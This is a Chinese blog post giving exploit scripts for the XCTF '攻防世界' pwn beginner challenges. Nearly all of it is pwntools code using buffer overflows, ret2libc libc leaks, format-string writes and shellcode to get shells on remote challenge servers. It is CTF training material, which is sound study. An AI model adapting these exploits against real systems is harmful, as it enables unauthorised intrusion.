攻防世界pwn新手村WP

最新推荐文章于 2023-03-17 09:38:18 发布
最新推荐文章于 2023-03-17 09:38:18 发布
阅读量183 收藏
点赞数
分类专栏: PWN学习篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ConlinderFeng/article/details/110797394
版权

攻防世界

一、level0

思路1

from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',30689)
system_call=0x400596
payload='A'*0x80+'B'*0x8+p64(system_call)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()

思路2

from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',45991)
pop_rdi=0x400663
system=0x400460
binsh=0x400684
payload='a'*0x80+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()

二、level2

from pwn import *
r=remote('220.249.52.133',38928)
sys_addr=0x08048320
binsh_addr=0x0804A024
payload='A'*0x88+'B'*0x4+p32(sys_addr)+'bbbb'+p32(binsh_addr)
r.recvuntil(':')
r.sendline(payload)
r.interactive()

三、level3
写法1

from pwn import *
from LibcSearcher import *
context.log_level='debug'
r=remote('220.249.52.133',32619)
elf=ELF('./level3')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
libc=LibcSearcher('write',write_addr)
base_addr=write_addr-libc.dump('write')
sys_addr=base_addr+libc.dump('system')
binsh=base_addr+libc.dump('str_bin_sh')
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()

写法2

from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',58376)
elf=ELF('./level3')
libc=ELF('./libc32.so.6')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
base_addr=write_addr-libc.sym['write']
sys_addr=base_addr+libc.sym['system']
binsh=base_addr+libc.search('/bin/sh').next()
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()

四、when_did_you_born

from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',44288)
r.recvuntil('lets get helloworld for bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()

五、hello_pwn

from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',40669)
r.recvuntil('bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()

六、guess_num

from pwn import *
from ctypes import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
r=remote('220.249.52.133',37416)
payload='a'*0x20+p64(0)
r.recvuntil('name:')
r.sendline(payload)
libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0)
for i in range(10):
	r.recvuntil('number:')
	r.sendline(str(libc.rand()%6+1))
	r.recvuntil('Success')
r.recvuntil('flag!')
r.interactive()

七、CGfsb

from pwn import *
context.log_level='debug'
io=remote("111.198.29.45","49496")
payload=p32(0x0804A068)+"aaaa"+"%10$n"
io.sendlineafter("please tell me your name:","aaa")
io.sendlineafter("leave your message please",payload)
io.interactive()

八、getshell
远程运行获取flag
九、int_overflow

from pwn import *
io = remote("111.198.29.45", 47271)
cat_flag_addr = 0x0804868B
io.sendlineafter("Your choice:", "1")
io.sendlineafter("your username:", "Sakura")
io.recvuntil("your passwd:")
payload = "a" * 0x14 + "aaaa" + p32(cat_flag_addr)+"a"*234
io.sendline(payload)
io.recv()
io.interactive()

十、cgpwn2

from pwn import *
r=remote('111.198.29.45',46997)
sys_addr=0x08048420
binsh=0x0804A080
payload=0x2A*'a'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('please tell me your name\n')
r.sendline('Sakura')
r.recvuntil('hello,you can leave some message here:\n')
r.sendline(payload)
r.interactive()

十一、string

from pwn import *
p = remote("111.198.29.45","49404")
context.log_level='debug'
p.recvuntil('secret[0] is')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
p.sendlineafter("What should your character's name be:", 'Sakura')
p.sendlineafter("east or up?:", 'east')
p.sendlineafter("(0)?:", '1')
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
p.sendlineafter("And, you wish is:", '%85c%7$n')
shellcode = asm(shellcraft.sh())
p.sendlineafter("SPELL", shellcode)
p.interactive()
叶叶扁舟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界-CGfsb详细知识点及解答
m0_74047686的博客
03-07 685
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
【ProM编程2】context--上下文
qq_40420514的博客
03-17 494
PluginContext的理念是,它提供了所有必要的接口来进行通信:框架,其他插件,以及用户.在本节中,我们首先讨论所有上下文中可用的一般功能。然后,我们讨论上下文的具体实现,以及如何定义需要特定上下文的插件。
栈溢出学习
feng的博客
01-16 1889
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 811
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
攻防世界详解CGfsb,格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 262
格式化字符串漏洞
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1591
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界-CGfsb
qq_45771413的博客
04-23 421
知识点 格式化字符串漏洞(printf) 检查保护 PIE没有保护,全局变量地址固定 IDA 逻辑很简单,输入name,输入message,然后当pwnme等于8时,自动执行cat flag操作。但是pwnme没有被赋值,也没有可操作的地方,需要把它改成8。 但是找了一圈没发现有栈溢出的地方,看wp发现是格式化字符串漏洞,只能嗯学(栈溢出还没整熟悉〒▽〒)。 格式化字符串知识点 格式化字符串(摘自CTF-WIKI) 格式化字符串函数是根据格式化字符串函数来进行解析的。那么相应的要被解析的参数的个数也自然
[攻防世界]CGfsb
逆向萌新的博客
06-20 210
[攻防世界]CGfsb详解
功防世界-pwn-新手练习(更新中)
Sea_Sand息禅
04-02 924
1、CGfsb:https://blog.csdn.net/zz_Caleb/article/details/88980866 2、when_did_you_born(简单的ROP) 下载文件,是一个64位的elf文件,放到ida中看伪码,报错: 搜了一下这个问题,是栈的问题,可以通过修改一些设置来解决,但是,找到了main函数: 在这个地方查看伪码不会报错,而且主函数的源码可以得到:...
PWN做题笔记7-CGfsb(这篇不要看了,写的时候没理解,理论分析部分有错误,但不想改)
qq_40923256的博客
04-21 248
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050&page=1 本题属于格式化字符串漏洞,主要利用gdb调试 文件中只有一个main方法,如图位置存在格式化字符串漏洞 这里需要提及一下格式化字符串漏洞的原理: 核心在于printf(&test)会将test解释为格式化字符串,并且,格式化字符串存在%n可以写入元素存储的地址中前面字符串长(注意地址%n
攻防世界pwn-CGfsb】
a_silly_coder的博客
05-18 273
首先检查文件保护 将文件拖入32位ida 阅读代码后,发现这是一个简单的格式化字符串漏洞,通过修改pwnme的数值为8,直接执行cat flag。pwnme在0x0804A068的位置。 随后用gdb确认偏移,有两种方法,一种是直接数栈上的位置,另一种是输入AAAA.%x.%x.%x查看。我采用第一种。 栈上是第11个位置,但是由于第一个位置参数是格式化字符串,所以输入的AAAA其实是格式化字符串的第10个参数。 开始编写攻击脚本。 from pwn import ...
CGfsb(xctf)
weixin_43868725的博客
05-06 652
0x0 程序保护和流程 保护: 流程: main() 可以明显的发现存在一个格式化字符串漏洞,然后当pwnme这个变量等于8时调用’cat flag’这个命令。又因为程序没有开启pie并且pwnme是全局变量,所以可以通过格式化字符串漏洞将pwnme这个变量改为8从而得到flag。 0x1 利用过程 首先先确定偏移量 可以发现偏移量是10,然后查看pwnme变量的地址 将pwnme的值改为...
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3355
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
关于Android中context和log的用法
qq_34820468的博客
10-25 634
1、context Android在new控件的时候,有时候会用this(ClassName.this),有时候会用getContext(),有时候又会见到context,或者getApplicationContext(),那他们有什么区别吗? TextView textView = new TextView(this); TextView textView = new TextView(Mai...
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叶叶扁舟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值